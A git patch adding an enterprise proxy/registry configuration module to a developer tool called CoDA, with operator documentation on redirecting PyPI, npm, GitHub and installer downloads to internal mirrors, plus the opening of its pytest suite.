From 2b7f940db7dfecbbfc8160a9cd89269f0f2ddb7e Mon Sep 17 00:00:00 2001
From: David O'Keeffe <david.okeeffe@databricks.com>
Date: Wed, 13 May 2026 13:32:56 +1000
Subject: [PATCH 01/10] feat(enterprise): add enterprise_config module + docs
 (proxy/registry mode)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Adds the single source of truth for the enterprise env-var contract that
redirects every external reach in CoDA (PyPI, npm, GitHub, claude.ai,
Hermes git URL) to internal mirrors (JFrog, Nexus, GitHub Enterprise).

Defaults preserve current behaviour entirely — non-enterprise deployments
see no behavioural change because every helper falls back to the upstream
public URL when its env var is unset.

This is PR 1 of 4 in the enterprise-hardening series. The module is
unwired (no callers yet) — that lands in PR 2 (install scripts +
app.py:run_setup integration).

- enterprise_config.py: is_enabled, proxy_env, npm_env, uv_env,
  subprocess_env, write_npmrc, mirror_github_release, mirror_github_api,
  claude_installer_url, hermes_pip_url, deepwiki_mcp_url, exa_mcp_url,
  startup_banner (secret-masked), bootstrap, doctor.
- tests/test_enterprise_config.py: 72 tests covering env-var permutations,
  URL rewriting, secret masking, idempotent npmrc writes, doctor with
  injected http_get.
- docs/enterprise.md: operator-facing config matrix, JFrog mirror
  conventions, sample app.yaml, troubleshooting, known-gotcha note
  about the requests-from-GitHub override in pyproject.toml.

Co-authored-by: Isaac
---
 docs/enterprise.md              | 231 ++++++++++++
 enterprise_config.py            | 499 +++++++++++++++++++++++++
 tests/test_enterprise_config.py | 641 ++++++++++++++++++++++++++++++++
 3 files changed, 1371 insertions(+)
 create mode 100644 docs/enterprise.md
 create mode 100644 enterprise_config.py
 create mode 100644 tests/test_enterprise_config.py

diff --git a/docs/enterprise.md b/docs/enterprise.md
new file mode 100644
index 0000000..9a4c0f0
--- /dev/null
+++ b/docs/enterprise.md
@@ -0,0 +1,231 @@
+# Enterprise Mode (Proxy / Registry)
+
+CoDA can run inside locked-down enterprise networks where outbound traffic is
+restricted to internal proxies, mirrors, and registries. This page documents
+the env-var contract that redirects every external reach.
+
+The default behaviour is unchanged when no enterprise vars are set —
+non-enterprise deployments continue to use public PyPI, npmjs.org, GitHub,
+and `claude.ai/install.sh`.
+
+## Scope
+
+This feature targets the **proxy/registry** lockdown profile:
+
+- Outbound is allowed but only to internal JFrog Artifactory / Nexus /
+  GitHub Enterprise.
+- Public PyPI, npmjs.org, github.com, claude.ai are unreachable.
+- TLS termination uses a corporate root CA.
+
+Fully air-gapped deployments (zero egress except to `DATABRICKS_HOST`) need
+binary vendoring, which is a separate follow-up feature.
+
+## Quick start
+
+1. Mirror the upstream binaries into your JFrog generic-local repo:
+
+   ```
+   {generic-repo}/cli/cli/releases/download/v2.50.0/gh_2.50.0_linux_amd64.tar.gz
+   {generic-repo}/databricks/cli/releases/download/v0.235.0/databricks_cli_0.235.0_linux_amd64.zip
+   {generic-repo}/micro-editor/micro/releases/download/v2.0.13/micro-2.0.13-linux64-static.tar.gz
+   ```
+
+   Convention: keep the same path tail as `github.com/.../releases/download/...`.
+   No path rewriting needed.
+
+2. Configure your Databricks App's `app.yaml` with the env vars you need
+   (see the table below). All are optional — set only what your environment
+   requires.
+
+3. Run `make enterprise-doctor` on the deployment host to confirm every
+   configured target is reachable before deploying.
+
+4. Deploy as normal: `make deploy`.
+
+## Env-var reference
+
+| Variable | Purpose | Default |
+|---|---|---|
+| `ENTERPRISE_MODE` | Master switch. When `true`, log a startup banner and warn on missing recommended mirrors. Behavioural overrides are still driven by the individual vars below — this flag is for diagnostics. | unset |
+| `HTTPS_PROXY` / `HTTP_PROXY` / `NO_PROXY` | Corporate egress proxy. Honoured natively by `curl`, `uv`, `npm`, `git`, `requests`. | unset |
+| `REQUESTS_CA_BUNDLE` / `NODE_EXTRA_CA_CERTS` / `SSL_CERT_FILE` | Corporate root CA bundle path (PEM). | unset |
+| `UV_DEFAULT_INDEX` | Internal PyPI proxy URL, e.g. `https://jfrog/api/pypi/pypi-virtual/simple/`. | public PyPI |
+| `UV_HTTP_TIMEOUT` | Larger timeout for slow proxies. | uv default |
+| `UV_INDEX_<name>_USERNAME` / `UV_INDEX_<name>_PASSWORD` | uv-native auth for named indexes. | unset |
+| `NPM_REGISTRY` | Internal npm registry URL. Written to `~/.npmrc`. | npmjs.org |
+| `NPM_TOKEN` | Bearer token for `NPM_REGISTRY`. Written to `~/.npmrc` as `//host/:_authToken`. | unset |
+| `GITHUB_API_BASE` | Replacement for `https://api.github.com` (GitHub Enterprise or JFrog API mirror). | `api.github.com` |
+| `GITHUB_RELEASE_MIRROR` | Replacement for `https://github.com` for release downloads. Path tail preserved — point at a JFrog generic-repo. | `github.com` |
+| `CLAUDE_INSTALLER_URL` | Override `https://claude.ai/install.sh`. | upstream |
+| `HERMES_PIP_URL` | Override `git+https://github.com/NousResearch/hermes-agent.git`. Can be a mirrored git URL or an internal-index package spec. | upstream git URL |
+| `DEEPWIKI_MCP_URL` / `EXA_MCP_URL` | Override or set empty to omit these MCP servers entirely. | upstream URLs |
+
+## Mirror conventions
+
+### GitHub releases
+
+`GITHUB_RELEASE_MIRROR` must serve assets at the **same path tail** as `github.com`:
+
+```
+{mirror}/{owner}/{repo}/releases/download/{tag}/{asset}
+```
+
+So `https://github.com/cli/cli/releases/download/v2.50.0/gh.tar.gz` becomes
+`{mirror}/cli/cli/releases/download/v2.50.0/gh.tar.gz`.
+
+In JFrog Artifactory, a *Generic* repository or a *Generic Remote* repo proxying
+github.com works without configuration.
+
+### GitHub API
+
+`GITHUB_API_BASE` replaces the hostname *and* prefix:
+
+```
+https://api.github.com/repos/cli/cli/releases/latest
+                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+                       path preserved
+```
+
+For GitHub Enterprise, the base path is typically `/api/v3`:
+`https://ghe.example.com/api/v3` — install scripts will hit
+`https://ghe.example.com/api/v3/repos/cli/cli/releases/latest`.
+
+### npm
+
+`~/.npmrc` is written automatically at app startup when `NPM_REGISTRY` is set.
+Format:
+
+```
+registry=https://jfrog.example.com/api/npm/npm-virtual/
+//jfrog.example.com/:_authToken=<NPM_TOKEN>
+always-auth=true
+```
+
+### PyPI
+
+uv reads `UV_DEFAULT_INDEX` from the environment. No file written; configuration
+is process-environment only.
+
+For named-index auth (when your proxy needs HTTP basic auth):
+
+```yaml
+- name: UV_DEFAULT_INDEX
+  value: https://jfrog.example.com/api/pypi/pypi-virtual/simple/
+- name: UV_INDEX_INTERNAL_USERNAME
+  value: svc-coda
+- name: UV_INDEX_INTERNAL_PASSWORD
+  value: <secret>
+```
+
+## Sample `app.yaml` snippet
+
+```yaml
+env:
+  # Master switch — enables startup banner and missing-mirror warnings.
+  - name: ENTERPRISE_MODE
+    value: "true"
+
+  # Corporate egress proxy.
+  - name: HTTPS_PROXY
+    value: http://proxy.corp.example.com:3128
+  - name: NO_PROXY
+    value: localhost,127.0.0.1,.corp.example.com
+
+  # Corporate root CA.
+  - name: REQUESTS_CA_BUNDLE
+    value: /etc/ssl/certs/corp-root.pem
+  - name: NODE_EXTRA_CA_CERTS
+    value: /etc/ssl/certs/corp-root.pem
+
+  # Internal PyPI proxy.
+  - name: UV_DEFAULT_INDEX
+    value: https://jfrog.example.com/api/pypi/pypi-virtual/simple/
+
+  # Internal npm registry.
+  - name: NPM_REGISTRY
+    value: https://jfrog.example.com/api/npm/npm-virtual/
+  - name: NPM_TOKEN
+    value: <use a Databricks secret reference here>
+
+  # GitHub mirror (releases + API).
+  - name: GITHUB_RELEASE_MIRROR
+    value: https://jfrog.example.com/artifactory/github-mirror
+  - name: GITHUB_API_BASE
+    value: https://ghe.example.com/api/v3
+
+  # Drop the public MCP servers from agent configs.
+  - name: DEEPWIKI_MCP_URL
+    value: ""
+  - name: EXA_MCP_URL
+    value: ""
+```
+
+## Troubleshooting
+
+### `HTTP 407 Proxy Authentication Required`
+
+Your proxy needs credentials. Include them in the URL:
+`HTTPS_PROXY=http://user:pass@proxy.corp.example.com:3128`. The startup banner
+masks the password in logs.
+
+### `SSL: CERTIFICATE_VERIFY_FAILED`
+
+The corporate root CA isn't in the trust store. Set
+`REQUESTS_CA_BUNDLE` (Python), `NODE_EXTRA_CA_CERTS` (npm/node), and
+`SSL_CERT_FILE` (catch-all) to a PEM bundle that includes your corp root.
+
+### `npm ERR! 401 Unauthorized`
+
+`NPM_TOKEN` is missing, wrong, or expired. Confirm with:
+```bash
+curl -H "Authorization: Bearer $NPM_TOKEN" "$NPM_REGISTRY"
+```
+
+### `uv: error: Could not connect to index`
+
+Check that `UV_DEFAULT_INDEX` ends in `/simple/` (the PEP 503 path). JFrog
+typically exposes PyPI as `/api/pypi/<repo>/simple/`.
+
+### `gh: failed to fetch latest release tag`
+
+`GITHUB_API_BASE` is unreachable or doesn't proxy the GitHub API. For
+JFrog-style mirrors, you may need to set the base to point at a service
+that proxies `api.github.com`, or pin the version manually in the install
+script.
+
+## Known gotcha: `requests` from GitHub in `pyproject.toml`
+
+`pyproject.toml` currently pins `requests` to a direct GitHub source:
+
+```toml
+[tool.uv.sources]
+requests = { git = "https://github.com/psf/requests", rev = "v2.33.0" }
+```
+
+This bypasses the PyPI proxy and breaks in enterprise environments. Two
+workarounds for customers:
+
+1. **Mirror `psf/requests` in your internal git** and override the URL with
+   a `pyproject.toml` patch in your deployment overlay.
+2. **Remove the override entirely** if your internal PyPI proxy has
+   `requests>=2.33.0` available.
+
+This is tracked as a follow-up — the override exists for transient Databricks
+internal-proxy gaps, and will be removed once those gaps close.
+
+## Pre-deploy reachability check
+
+Run `make enterprise-doctor` from the deployment host:
+
+```
+$ make enterprise-doctor
+enterprise_config: effective settings
+  ENTERPRISE_MODE=true
+  HTTPS_PROXY=http://proxy.corp.example.com:3128
+  ...
+[PASS] NPM_REGISTRY        https://jfrog.example.com/api/npm/npm-virtual/  HTTP 200
+[PASS] UV_DEFAULT_INDEX    https://jfrog.example.com/api/pypi/pypi-virtual/simple/  HTTP 200
+[PASS] GITHUB_RELEASE_MIRROR  https://jfrog.example.com/artifactory/github-mirror  HTTP 200
+```
+
+Any FAIL line is something your network team needs to fix before deployment.
diff --git a/enterprise_config.py b/enterprise_config.py
new file mode 100644
index 0000000..a1878f5
--- /dev/null
+++ b/enterprise_config.py
@@ -0,0 +1,499 @@
+"""Enterprise-mode configuration for restricted networks (proxy/registry mode).
+
+CoDA's default behaviour assumes outbound internet to public registries
+(npmjs.org, pypi.org), GitHub (release tarballs, api.github.com), and
+claude.ai (Claude Code installer). In locked-down enterprise environments
+these are firewalled — only internal mirrors (JFrog Artifactory, Nexus,
+GitHub Enterprise) are reachable.
+
+This module is the single source of truth for the env-var contract that
+redirects every external reach. Setup scripts and install scripts consult
+helpers here rather than reading env vars directly, so the contract has
+exactly one place to test, one place to log, and one place to evolve.
+
+**Default behaviour with no env vars set is unchanged**: every helper falls
+back to the original public URL, so non-enterprise deployments see zero
+behavioural difference.
+
+Env-var contract:
+
+  ENTERPRISE_MODE                Master switch. When truthy, log a banner
+                                 at startup and warn on missing mirrors.
+                                 Behavioural overrides are driven by the
+                                 individual vars below, not by this flag.
+
+  HTTPS_PROXY / HTTP_PROXY       Corporate egress proxy. Honoured natively by
+  NO_PROXY                       curl, uv, npm, git, requests — we just pass
+                                 them through to subprocesses.
+
+  REQUESTS_CA_BUNDLE             Corporate root CA bundle (PEM). Honoured by
+  NODE_EXTRA_CA_CERTS            requests, node, openssl respectively.
+  SSL_CERT_FILE
+
+  UV_DEFAULT_INDEX               Internal PyPI proxy (e.g. JFrog pypi-virtual).
+  UV_HTTP_TIMEOUT                Larger timeout for slow proxies.
+
+  NPM_REGISTRY                   Internal npm registry URL. Written to
+                                 ~/.npmrc as `registry=...`.
+  NPM_TOKEN                      Bearer token for NPM_REGISTRY. Written as
+                                 `//host/:_authToken=...`.
+
+  GITHUB_API_BASE                Replacement for https://api.github.com.
+  GITHUB_RELEASE_MIRROR          Replacement for https://github.com (release
+                                 download paths). Convention: mirror keeps the
+                                 same `/{owner}/{repo}/releases/download/...`
+                                 tail, so it works against a JFrog generic-repo
+                                 proxy with no path rewriting.
+
+  CLAUDE_INSTALLER_URL           Override https://claude.ai/install.sh.
+  HERMES_PIP_URL                 Override the upstream Hermes git URL for
+                                 `uv tool install`.
+
+  DEEPWIKI_MCP_URL               Override or set empty to omit the DeepWiki
+  EXA_MCP_URL                    and Exa MCP servers (public endpoints).
+"""
+
+from __future__ import annotations
+
+import logging
+import os
+import re
+from pathlib import Path
+from typing import Iterable
+from urllib.parse import urlparse
+
+logger = logging.getLogger(__name__)
+
+
+# --- Constants ---------------------------------------------------------------
+
+DEFAULT_GITHUB_API = "https://api.github.com"
+DEFAULT_GITHUB_HOST = "https://github.com"
+DEFAULT_CLAUDE_INSTALLER = "https://claude.ai/install.sh"
+DEFAULT_HERMES_PIP_URL = "git+https://github.com/NousResearch/hermes-agent.git"
+DEFAULT_DEEPWIKI_MCP = "https://mcp.deepwiki.com/mcp"
+DEFAULT_EXA_MCP = "https://mcp.exa.ai/mcp"
+
+# Env vars that surface in the startup banner (masked if they look secret-y).
+_BANNER_VARS = (
+    "ENTERPRISE_MODE",
+    "HTTPS_PROXY",
+    "HTTP_PROXY",
+    "NO_PROXY",
+    "REQUESTS_CA_BUNDLE",
+    "NODE_EXTRA_CA_CERTS",
+    "SSL_CERT_FILE",
+    "UV_DEFAULT_INDEX",
+    "UV_HTTP_TIMEOUT",
+    "NPM_REGISTRY",
+    "NPM_TOKEN",
+    "GITHUB_API_BASE",
+    "GITHUB_RELEASE_MIRROR",
+    "CLAUDE_INSTALLER_URL",
+    "HERMES_PIP_URL",
+    "DEEPWIKI_MCP_URL",
+    "EXA_MCP_URL",
+)
+
+# Vars treated as secrets in the banner (full value masked).
+_SECRET_VARS = frozenset({"NPM_TOKEN"})
+
+
+# --- Truthy parsing ----------------------------------------------------------
+
+
+def _truthy(value: str | None) -> bool:
+    """Treat the standard set of "yes" strings as true; everything else false.
+
+    Mirrors what setup_hermes.py does for ENABLE_HERMES so operators don't have
+    to remember a different convention here.
+    """
+    if value is None:
+        return False
+    return value.strip().lower() in ("true", "1", "yes", "on")
+
+
+def is_enabled() -> bool:
+    """Return True when ENTERPRISE_MODE is set to a truthy value."""
+    return _truthy(os.environ.get("ENTERPRISE_MODE"))
+
+
+# --- Env-var pass-through helpers --------------------------------------------
+
+
+def _passthrough(*names: str) -> dict[str, str]:
+    """Pluck the named env vars from os.environ, dropping unset/blank ones."""
+    out: dict[str, str] = {}
+    for name in names:
+        value = os.environ.get(name, "")
+        if value:
+            out[name] = value
+    return out
+
+
+def proxy_env() -> dict[str, str]:
+    """Return proxy and CA-bundle env vars to forward to subprocesses.
+
+    Includes both upper- and lower-case spellings because some tools only
+    consult one (curl looks at lowercase; many Python libs look at uppercase).
+    """
+    upper = _passthrough(
+        "HTTPS_PROXY",
+        "HTTP_PROXY",
+        "NO_PROXY",
+        "REQUESTS_CA_BUNDLE",
+        "NODE_EXTRA_CA_CERTS",
+        "SSL_CERT_FILE",
+    )
+    # Mirror to lowercase for curl/wget which only honour lowercase.
+    mirrored = dict(upper)
+    for upper_name, lower_name in (
+        ("HTTPS_PROXY", "https_proxy"),
+        ("HTTP_PROXY", "http_proxy"),
+        ("NO_PROXY", "no_proxy"),
+    ):
+        if upper_name in upper and lower_name not in os.environ:
+            mirrored[lower_name] = upper[upper_name]
+    return mirrored
+
+
+def uv_env() -> dict[str, str]:
+    """Return uv-specific env vars (PyPI index, timeout, auth)."""
+    out: dict[str, str] = {}
+    index = os.environ.get("UV_DEFAULT_INDEX", "").strip()
+    if index:
+        out["UV_DEFAULT_INDEX"] = index
+    timeout = os.environ.get("UV_HTTP_TIMEOUT", "").strip()
+    if timeout:
+        out["UV_HTTP_TIMEOUT"] = timeout
+    # Forward any UV_INDEX_<name>_USERNAME / UV_INDEX_<name>_PASSWORD pairs
+    # the operator has set — uv reads these natively.
+    for key, value in os.environ.items():
+        if key.startswith("UV_INDEX_") and (
+            key.endswith("_USERNAME") or key.endswith("_PASSWORD")
+        ):
+            if value:
+                out[key] = value
+    return out
+
+
+def npm_env() -> dict[str, str]:
+    """Return npm config env vars derived from NPM_REGISTRY / NPM_TOKEN.
+
+    `npm` reads `npm_config_<key>=value` style env vars natively. Setting
+    `npm_config_registry` is equivalent to writing `registry=` in `.npmrc`,
+    but the env-var form survives subprocess boundaries even if `.npmrc`
+    hasn't been written yet.
+    """
+    out: dict[str, str] = {}
+    registry = os.environ.get("NPM_REGISTRY", "").strip()
+    token = os.environ.get("NPM_TOKEN", "").strip()
+    if registry:
+        out["npm_config_registry"] = registry
+        if token:
+            host = urlparse(registry).hostname
+            if host:
+                # npm's auth-token key format: //host/:_authToken=...
+                out[f"npm_config_//{host}/:_authToken"] = token
+    return out
+
+
+def subprocess_env(base: dict[str, str] | None = None) -> dict[str, str]:
+    """Build an env dict combining base + proxy + uv + npm settings.
+
+    `base` defaults to a copy of `os.environ` so callers can pass it straight
+    to `subprocess.run(env=...)`. Caller can also pass an empty dict to get a
+    "just the enterprise additions" view, useful for logging or diffing.
+    """
+    merged: dict[str, str] = dict(base if base is not None else os.environ)
+    merged.update(proxy_env())
+    merged.update(uv_env())
+    merged.update(npm_env())
+    return merged
+
+
+# --- Persistent npm config ---------------------------------------------------
+
+
+def write_npmrc(home: Path | str) -> Path | None:
+    """Write `~/.npmrc` with NPM_REGISTRY + NPM_TOKEN if set.
+
+    Idempotent: re-running with the same env produces an identical file.
+    No-op (returns None) if NPM_REGISTRY is unset, so non-enterprise
+    deployments keep using the public npmjs.org default.
+
+    Some npm operations (notably `npm view` via `utils.get_npm_version`) prefer
+    `.npmrc` over env vars in edge cases, and a developer who shells into the
+    container should see the same registry as the install scripts.
+    """
+    registry = os.environ.get("NPM_REGISTRY", "").strip()
+    token = os.environ.get("NPM_TOKEN", "").strip()
+    if not registry:
+        return None
+
+    home_path = Path(home)
+    npmrc = home_path / ".npmrc"
+    home_path.mkdir(parents=True, exist_ok=True)
+
+    lines = [f"registry={registry}"]
+    host = urlparse(registry).hostname
+    if token and host:
+        lines.append(f"//{host}/:_authToken={token}")
+    lines.append("always-auth=true")
+    content = "\n".join(lines) + "\n"
+
+    if npmrc.exists() and npmrc.read_text() == content:
+        return npmrc
+    npmrc.write_text(content)
+    try:
+        npmrc.chmod(0o600)
+    except OSError:
+        # Best effort — chmod can fail on some workspace filesystems.
+        pass
+    return npmrc
+
+
+# --- URL mirrors -------------------------------------------------------------
+
+
+def _github_release_mirror() -> str:
+    """Return the configured release mirror with trailing slash stripped."""
+    return os.environ.get("GITHUB_RELEASE_MIRROR", "").strip().rstrip("/")
+
+
+def mirror_github_release(url: str) -> str:
+    """Rewrite a github.com release URL to the configured mirror.
+
+    Mirror convention: same path tail as github.com. So
+    `https://github.com/cli/cli/releases/download/v2.50.0/gh.tar.gz`
+    becomes
+    `{GITHUB_RELEASE_MIRROR}/cli/cli/releases/download/v2.50.0/gh.tar.gz`.
+
+    Non-github URLs and unset mirror pass through unchanged.
+    """
+    if not url:
+        return url
+    mirror = _github_release_mirror()
+    if not mirror:
+        return url
+    parsed = urlparse(url)
+    if parsed.hostname not in ("github.com", "www.github.com"):
+        return url
+    path = parsed.path or "/"
+    return f"{mirror}{path}"
+
+
+def mirror_github_api(url: str) -> str:
+    """Rewrite an api.github.com URL to GITHUB_API_BASE if set."""
+    if not url:
+        return url
+    base = os.environ.get("GITHUB_API_BASE", "").strip().rstrip("/")
+    if not base:
+        return url
+    parsed = urlparse(url)
+    if parsed.hostname not in ("api.github.com",):
+        return url
+    return f"{base}{parsed.path}"
+
+
+def claude_installer_url() -> str:
+    """Return the URL for the Claude Code installer (overridable)."""
+    return (
+        os.environ.get("CLAUDE_INSTALLER_URL", "").strip() or DEFAULT_CLAUDE_INSTALLER
+    )
+
+
+def hermes_pip_url() -> str:
+    """Return the package spec for `uv tool install hermes-agent` (overridable).
+
+    Default is the upstream git URL. Enterprise deployments typically set this
+    to a mirrored git URL or an internal-index package spec like
+    `hermes-agent==1.2.3` once the package is mirrored in their PyPI proxy.
+    """
+    return os.environ.get("HERMES_PIP_URL", "").strip() or DEFAULT_HERMES_PIP_URL
+
+
+def deepwiki_mcp_url() -> str | None:
+    """Return the DeepWiki MCP URL, or None if explicitly disabled.
+
+    Operators can set DEEPWIKI_MCP_URL to an empty string in app.yaml to
+    drop DeepWiki from the configs entirely (its public endpoint is
+    typically blocked in locked-down envs).
+    """
+    raw = os.environ.get("DEEPWIKI_MCP_URL")
+    if raw is None:
+        return DEFAULT_DEEPWIKI_MCP
+    stripped = raw.strip()
+    return stripped or None
+
+
+def exa_mcp_url() -> str | None:
+    """Return the Exa MCP URL, or None if explicitly disabled."""
+    raw = os.environ.get("EXA_MCP_URL")
+    if raw is None:
+        return DEFAULT_EXA_MCP
+    stripped = raw.strip()
+    return stripped or None
+
+
+# --- Banner / diagnostics ----------------------------------------------------
+
+
+def _mask(name: str, value: str) -> str:
+    """Mask secret-shaped values for logging.
+
+    Tokens (NPM_TOKEN) are always fully masked. URLs that contain a userinfo
+    component (https://user:pass@host) get the password redacted.
+    """
+    if name in _SECRET_VARS:
+        return "***"
+    # Redact URL passwords (https://user:pass@host -> https://user:***@host)
+    return re.sub(r"(://[^:/@\s]+:)[^@\s]+(@)", r"\1***\2", value)
+
+
+def startup_banner() -> str:
+    """Return a multi-line, log-friendly summary of the active enterprise config.
+
+    Secrets are masked. Lines are sorted for deterministic output (helpful in
+    tests and diffs).
+    """
+    lines = ["enterprise_config: effective settings"]
+    for name in _BANNER_VARS:
+        value = os.environ.get(name, "")
+        if value:
+            lines.append(f"  {name}={_mask(name, value)}")
+        else:
+            lines.append(f"  {name}=<unset>")
+    return "\n".join(lines)
+
+
+def missing_when_enabled() -> list[str]:
+    """Return the list of recommended env vars that are unset when enterprise mode is on.
+
+    Used by `bootstrap()` to log warnings (not errors — the operator may
+    intentionally leave some vars unset, e.g. if their internal mirror handles
+    npm but not PyPI yet).
+    """
+    if not is_enabled():
+        return []
+    recommended = (
+        "UV_DEFAULT_INDEX",
+        "NPM_REGISTRY",
+        "GITHUB_RELEASE_MIRROR",
+    )
+    return [name for name in recommended if not os.environ.get(name, "").strip()]
+
+
+def bootstrap(home: Path | str | None = None) -> None:
+    """Apply enterprise config side-effects: ~/.npmrc, banner, warnings.
+
+    Call once at app startup, before any setup subprocess runs. Idempotent.
+
+    Pushes derived env vars (npm_config_registry, etc.) into os.environ so
+    every subsequent subprocess inherits them via the parent's environment —
+    no need to thread an `env=` arg through every `subprocess.run` call.
+    """
+    home_path = (
+        Path(home)
+        if home is not None
+        else Path(os.environ.get("HOME", str(Path.home())))
+    )
+
+    # 1. Persist npm registry config to disk.
+    try:
+        write_npmrc(home_path)
+    except Exception as e:  # noqa: BLE001 — diagnostic logging only
+        logger.warning("enterprise_config: write_npmrc failed: %s", e)
+
+    # 2. Push derived env into os.environ so subprocesses inherit it.
+    for key, value in npm_env().items():
+        os.environ.setdefault(key, value)
+    for key, value in uv_env().items():
+        os.environ.setdefault(key, value)
+    for key, value in proxy_env().items():
+        # Lowercase pass-through vars may collide with case-sensitive shells;
+        # setdefault keeps any explicit operator value intact.
+        os.environ.setdefault(key, value)
+
+    # 3. Log effective config (always — useful for debugging non-enterprise
+    #    deployments too, since the banner shows everything is `<unset>`).
+    for line in startup_banner().splitlines():
+        logger.info(line)
+
+    # 4. Warn about recommended-but-unset mirrors only when ENTERPRISE_MODE is on.
+    missing = missing_when_enabled()
+    if missing:
+        logger.warning(
+            "enterprise_config: ENTERPRISE_MODE=true but recommended mirrors "
+            "are unset: %s",
+            ", ".join(missing),
+        )
+
+
+# --- Reachability ------------------------------------------------------------
+
+
+def doctor_targets() -> list[tuple[str, str]]:
+    """Return (name, url) pairs that should be reachable in the current config.
+
+    Used by scripts/enterprise_doctor.py. Returns only the targets that are
+    actually configured — there's no point checking the GitHub release mirror
+    if the operator hasn't set GITHUB_RELEASE_MIRROR.
+    """
+    targets: list[tuple[str, str]] = []
+    if index := os.environ.get("UV_DEFAULT_INDEX", "").strip():
+        targets.append(("UV_DEFAULT_INDEX", index))
+    if registry := os.environ.get("NPM_REGISTRY", "").strip():
+        targets.append(("NPM_REGISTRY", registry))
+    if mirror := _github_release_mirror():
+        targets.append(("GITHUB_RELEASE_MIRROR", mirror))
+    if api := os.environ.get("GITHUB_API_BASE", "").strip().rstrip("/"):
+        targets.append(("GITHUB_API_BASE", api))
+    if installer := os.environ.get("CLAUDE_INSTALLER_URL", "").strip():
+        targets.append(("CLAUDE_INSTALLER_URL", installer))
+    return targets
+
+
+def doctor(http_get: object | None = None) -> list[tuple[str, str, bool, str]]:
+    """Probe each configured target. Returns (name, url, ok, detail) tuples.
+
+    `http_get` is injected for testing — defaults to `requests.get`. Any
+    response (even 401/404) counts as reachable; only connection errors and
+    timeouts mean unreachable.
+    """
+    if http_get is None:
+        import requests
+
+        def http_get(url: str):  # type: ignore[no-redef]
+            return requests.get(url, timeout=5, allow_redirects=False)
+
+    results: list[tuple[str, str, bool, str]] = []
+    for name, url in doctor_targets():
+        try:
+            resp = http_get(url)
+            results.append((name, url, True, f"HTTP {resp.status_code}"))
+        except Exception as e:  # noqa: BLE001 — surface every error verbatim
+            results.append((name, url, False, str(e)[:200]))
+    return results
+
+
+# --- Convenience for shell scripts -------------------------------------------
+
+
+def shell_export_lines(names: Iterable[str] | None = None) -> list[str]:
+    """Render env-var values as `export FOO=bar` lines for shell scripts.
+
+    Used by `scripts/enterprise_doctor.py` or by debug shells that want to
+    replay the effective config without re-running bootstrap().
+    """
+    if names is None:
+        names = _BANNER_VARS
+    lines: list[str] = []
+    for name in names:
+        value = os.environ.get(name, "")
+        if not value:
+            continue
+        # Single-quote the value, escaping any embedded single quotes.
+        escaped = value.replace("'", "'\\''")
+        lines.append(f"export {name}='{escaped}'")
+    return lines
diff --git a/tests/test_enterprise_config.py b/tests/test_enterprise_config.py
new file mode 100644
index 0000000..9de2661
--- /dev/null
+++ b/tests/test_enterprise_config.py
@@ -0,0 +1,641 @@
+"""Tests for enterprise_config.py — env-var contract for restricted networks."""
+
+from __future__ import annotations
+
+import os
+from unittest import mock
+
+import pytest
+
+
+# ---------------------------------------------------------------------------
+# Helper: scrub the env so each test starts from a known baseline.
+# Any new var we touch must be added here.
+# ---------------------------------------------------------------------------
+
+ENTERPRISE_VARS = (
+    "ENTERPRISE_MODE",
+    "HTTPS_PROXY",
+    "HTTP_PROXY",
+    "NO_PROXY",
+    "https_proxy",
+    "http_proxy",
+    "no_proxy",
+    "REQUESTS_CA_BUNDLE",
+    "NODE_EXTRA_CA_CERTS",
+    "SSL_CERT_FILE",
+    "UV_DEFAULT_INDEX",
+    "UV_HTTP_TIMEOUT",
+    "UV_INDEX_INTERNAL_USERNAME",
+    "UV_INDEX_INTERNAL_PASSWORD",
+    "NPM_REGISTRY",
+    "NPM_TOKEN",
+    "GITHUB_API_BASE",
+    "GITHUB_RELEASE_MIRROR",
+    "CLAUDE_INSTALLER_URL",
+    "HERMES_PIP_URL",
+    "DEEPWIKI_MCP_URL",
+    "EXA_MCP_URL",
+    "npm_config_registry",
+)
+
+
+@pytest.fixture(autouse=True)
+def _clean_env(monkeypatch):
+    """Strip every enterprise env var before each test."""
+    for name in ENTERPRISE_VARS:
+        monkeypatch.delenv(name, raising=False)
+    # Also remove any computed npm_config_// keys lingering from prior tests
+    for key in list(os.environ.keys()):
+        if key.startswith("npm_config_//"):
+            monkeypatch.delenv(key, raising=False)
+
+
+# ---------------------------------------------------------------------------
+# 1. is_enabled / _truthy parsing
+# ---------------------------------------------------------------------------
+
+
+class TestIsEnabled:
+    """ENTERPRISE_MODE is parsed leniently to match ENABLE_HERMES conventions."""
+
+    def test_unset_returns_false(self):
+        from enterprise_config import is_enabled
+
+        assert is_enabled() is False
+
+    @pytest.mark.parametrize(
+        "value", ["true", "TRUE", "True", "1", "yes", "on", " true "]
+    )
+    def test_truthy_values(self, value, monkeypatch):
+        monkeypatch.setenv("ENTERPRISE_MODE", value)
+        from enterprise_config import is_enabled
+
+        assert is_enabled() is True
+
+    @pytest.mark.parametrize("value", ["false", "0", "no", "off", "", "  ", "maybe"])
+    def test_falsy_values(self, value, monkeypatch):
+        monkeypatch.setenv("ENTERPRISE_MODE", value)
+        from enterprise_config import is_enabled
+
+        assert is_enabled() is False
+
+
+# ---------------------------------------------------------------------------
+# 2. proxy_env — pass-through + lowercase mirroring
+# ---------------------------------------------------------------------------
+
+
+class TestProxyEnv:
+    def test_empty_when_unset(self):
+        from enterprise_config import proxy_env
+
+        assert proxy_env() == {}
+
+    def test_passes_through_set_vars(self, monkeypatch):
+        monkeypatch.setenv("HTTPS_PROXY", "http://proxy:3128")
+        monkeypatch.setenv("NO_PROXY", "localhost,.internal")
+        monkeypatch.setenv("REQUESTS_CA_BUNDLE", "/etc/ssl/corp.pem")
+        from enterprise_config import proxy_env
+
+        result = proxy_env()
+        assert result["HTTPS_PROXY"] == "http://proxy:3128"
+        assert result["NO_PROXY"] == "localhost,.internal"
+        assert result["REQUESTS_CA_BUNDLE"] == "/etc/ssl/corp.pem"
+
+    def test_mirrors_to_lowercase_for_curl(self, monkeypatch):
+        monkeypatch.setenv("HTTPS_PROXY", "http://proxy:3128")
+        monkeypatch.setenv("HTTP_PROXY", "http://proxy:3128")
+        from enterprise_config import proxy_env
+
+        result = proxy_env()
+        assert result["https_proxy"] == "http://proxy:3128"
+        assert result["http_proxy"] == "http://proxy:3128"
+
+    def test_explicit_lowercase_not_overwritten(self, monkeypatch):
+        """If operator already set lowercase var explicitly, leave it alone."""
+        monkeypatch.setenv("HTTPS_PROXY", "http://upper:3128")
